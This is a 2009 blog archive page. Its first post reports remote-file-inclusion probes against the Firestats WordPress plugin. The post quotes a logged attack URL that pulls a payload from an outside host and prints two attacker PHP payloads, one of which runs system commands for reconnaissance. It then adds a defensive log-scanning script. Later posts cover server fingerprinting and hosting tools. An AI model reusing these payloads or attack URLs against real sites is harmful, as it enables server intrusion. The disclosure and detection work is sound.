Archive

Posts Tagged ‘php’

Firestats WordPress Exploit

June 13th, 2009 4 comments

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there have been over 600 attempts from servers all over the globe. Each one requests firestats-wordpress.php with the fs_javascript parameter pointing at a script hosted elsewhere, which the vulnerable plugin then fetches and runs: a classic remote file inclusion.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to come in two versions. The most common one, as in the request above, has the following contents. All it does is print the marker string FeeLCoMz and stop, so the attacker's scanner can tell from the response body whether the inclusion worked:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?> // prints the marker and exits; nothing else runs

The other one is a basic reconnaissance script. It reports the kernel version, the user the web server runs as, and disk usage of the current directory:

<?php
// Formats a byte count using crude string-length thresholds rather than
// comparing magnitudes, so the result is only approximate.
function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number); }
    if($len >= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024); }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024); }
    return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
// Unquoted bareword: PHP 5 treats the undefined constant as the string "id"
// (with a notice), so this runs the id command as the web server's user.
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

// Everything below is echoed into the page the scanner fetched.
echo "0sirys was here and also is a fucking gay..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

All I can recommend at the moment is removing Firestats from your WordPress installation. It seems to be the only way to be sure.
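As an added example (this is not code from the original post or from the Firestats project), here is a Python script that scans Apache combined-format access log lines for the probe pattern quoted above: a request to firestats-wordpress.php whose fs_javascript parameter carries a remote URL or a PHP stream wrapper. The log lines, IP addresses and payload hosts in it are constructed for illustration, and the function names are my own, not WordPress or Firestats APIs.

```python
"""Scan Apache combined-format access logs for Firestats RFI probes.

Added example, not code from the original post or from the Firestats project.
The log lines, IP addresses and payload hosts below are constructed; the
function names are this example's own, not Firestats or WordPress APIs.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format; only the fields we use are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Anything PHP's URL-aware include could fetch from elsewhere: a full
# scheme://host URL, or the data:/php: stream wrappers.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|data:|php:)', re.IGNORECASE)

# Constructed sample log, modelled on the request quoted in the post.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Jun/2009:10:21:33 +0100] "GET /tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://payload.example.net/forum/fx29id.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [13/Jun/2009:10:22:01 +0100] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://other.example.org/id.txt? HTTP/1.0" 404 231 "-" "Mozilla/5.0"
203.0.113.10 - - [13/Jun/2009:10:22:40 +0100] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=ftp://payload.example.net/fx29id.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.5 - - [13/Jun/2009:10:23:15 +0100] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=1 HTTP/1.1" 200 1830 "http://blog.example/" "Mozilla/5.0"
192.0.2.9 - - [13/Jun/2009:10:24:00 +0100] "GET /2009/06/some-post/ HTTP/1.1" 200 9822 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the captured fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def firestats_rfi(record):
    """Return the remote payload URL if the request is an RFI probe, else None."""
    if record is None:
        return None
    parts = urlsplit(record["path"])
    # WordPress rewrites mean the plugin path may carry a prefix (/tag/... in
    # the post), so match on the suffix rather than the full path.
    if not parts.path.endswith("/firestats-wordpress.php"):
        return None
    # keep_blank_values so an empty fs_javascript= still appears in the dict.
    qs = parse_qs(parts.query, keep_blank_values=True)
    for value in qs.get("fs_javascript", []):
        if REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Yield (ip, timestamp, status, payload_url) for every probe found."""
    for line in lines:
        rec = parse_line(line)
        url = firestats_rfi(rec)
        if url:
            yield rec["ip"], rec["ts"], rec["status"], url


def summarise(lines):
    """Group probes by payload host (who is hosting the shell) and by source IP."""
    hits = list(scan(lines))
    return {
        "hits": hits,
        "payload_hosts": Counter(urlsplit(u).hostname for _, _, _, u in hits),
        "source_ips": Counter(ip for ip, _, _, _ in hits),
    }


if __name__ == "__main__":
    report = summarise(SAMPLE_LOG.splitlines())
    for ip, ts, status, url in report["hits"]:
        print(f"{ts} {ip} -> {status} {url}")
    print("payload hosts:", dict(report["payload_hosts"]))
    print("source IPs:", dict(report["source_ips"]))
```

Two caveats when reading the output. A 200 in the log only says the plugin answered; whether the included payload actually ran is only visible in the response body (the FeeLCoMz marker) or on the server itself, so treat every hit with a 200 as worth checking, not as proof of compromise. And the PHP-side mitigation for this whole class of bug, independent of the Firestats fix, is allow_url_include = Off in php.ini (available since PHP 5.2), which stops include and require from fetching http://, ftp:// and data: sources at all.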

What are the online newspapers running?

March 4th, 2009 No comments

Having been obsessed with computers and networks for many years, I am always interested to find out the infrastructure behind some of the more popular sites out there. Quite often it is possible to glean bits of information here and there, and occasionally an error page offers a glimpse of what is happening in the back end.

Today it is the turn of the Irish Independent. I got the error pictured here while browsing through their site. What is interesting about it is the domain name: externalcontent.independent.ie. As we can see it is served by an Apache web server running on a Red Hat machine. However, if you look at the error more closely it is a bit more telling.

The server in question (externalcontent.independent.ie) attempted to serve up an ad or content related to loadzajobs.ie but was unable to contact the back end server. So this tells me that externalcontent.independent.ie is configured as a reverse proxy server, and according to Netcraft it is located in Ireland.

The primary domain, www.independent.ie, is hosted in the Netherlands and runs Apache Coyote, again according to Netcraft. Apache Coyote is the HTTP connector for Apache Tomcat. I find it curious that the main www site is located in the Netherlands, but I suspect that it might have something to do with being connected to the Amsterdam Internet Exchange, which is the largest Internet Exchange in the world.

It does make me wonder why they chose AMS-IX given that here in Ireland we have INEX.

So what about the other national daily online newspapers?

The Irish Times is hosted in Dublin on Linux and Apache, and The Irish Examiner is hosted on Windows Server 2003 and Microsoft IIS 6.

Although there are Irish editions of the Sun, The Star, The Daily Mail and The Mirror, none of them have specifically Irish-oriented sites, but I will include them here nonetheless.

The Sun claims to be hosted on Linux and Apache; however, they use Akamai for content delivery, so this could be inaccurate.

The Daily Star claims to be hosted on an unknown Unix and Apache, and the Daily Mirror is hosted on Red Hat Linux and Apache.

Finally the Daily Mail, like the Sun, also uses Akamai for content delivery and claims to be running Linux and Apache.

It’s clear that Apache and Linux are the front runners.

Alternative web analytics

February 20th, 2009 4 comments

I have something of an obsession with poring over my logfiles. Whichever PC or laptop I happen to be using at home will always have an ssh session open in the background with a tail of my reverse proxy's logs whizzing by. But when it comes to running reports there are plenty of options. I have used most of them, and two days ago I discarded them all for a new alternative.

Up until recently I was using both Google Analytics and Woopra. They both pretty much report the same information with just a different look. One issue I noticed with both was performance. Occasionally a page would stall or load slowly while the client connected to one of my sites was waiting to load the script from either Google or Woopra. And as anybody can testify, waiting for a page to load, even if it is just for a couple of seconds, can be frustrating.

In addition to Google Analytics and Woopra I also used AWStats to parse the log file. That is fine for one site, but when running multiple sites it can become a bit of a pain as each site has its own report. Ideally what I was looking for was something more real-time, like Google Analytics and Woopra. And what I found was Piwik!

Although it is in early beta it was a doddle to set up. I created a new domain and set it up to accept stats from each of my own sites. Each site gets its own dashboard. Once you set up a site you get a little bit of JavaScript to insert somewhere on your pages.

For my WordPress-powered sites I did this by simply inserting the script into the theme's footer.php, and for my primary site, powered by MediaWiki, it was a similar process. Although once I had everything set up I noticed that there is a WordPress plugin available.

I already mentioned it is in beta so there are a few quirks but overall it is a nice piece of software and is running rather well for me.

Screenshot from Piwik homepage.

Use Webmin? Host domains? Check out Virtualmin

January 21st, 2009 No comments

When I originally decided to host from home a few years back I had to do more than just decide to fire up a web server and NAT from my router to it. Choosing an operating system, web server software and application server was another consideration. Did I want to run Linux? Solaris? Microsoft IIS? And did I want to go with PHP or ASP? What was I going to use as a CMS for my primary site, and what blog software would suit my requirements?

Ultimately I decided on OpenBSD with Apache and PHP, and Windows with IIS. Of course I knew that over time I would be constantly changing this, and I needed a way to effectively manage the domains themselves, the sites and the database dumps. Obviously I needed a control panel of some sort, and after a bit of investigation I settled on Virtualmin.

Virtualmin is created by the same people who created the excellent and utterly essential Webmin control panel, and as such the Virtualmin module integrates nicely into Webmin. Oh, and it's free!

Originally this site was hosted on Windows Server and IIS and powered by BlogEngine.NET, but I found it a bit of a pain to handle two different types of blogging software, so I migrated this blog over to WordPress and host it with my other sites. Over time my other server changed several times: from OpenBSD to Ubuntu, then Solaris 10 running on a Sun workstation, back to Ubuntu, and currently the Debian machine where the sites now reside. With Virtualmin, moving platforms was a simple matter of restoring from the backups that I took from the machine that was to be replaced.

Of course, with it now being relatively trivial to change servers I find myself experimenting a bit more, and I'm currently fighting the urge to move everything over to a FreeBSD server. For the moment I'm successfully resisting that urge!
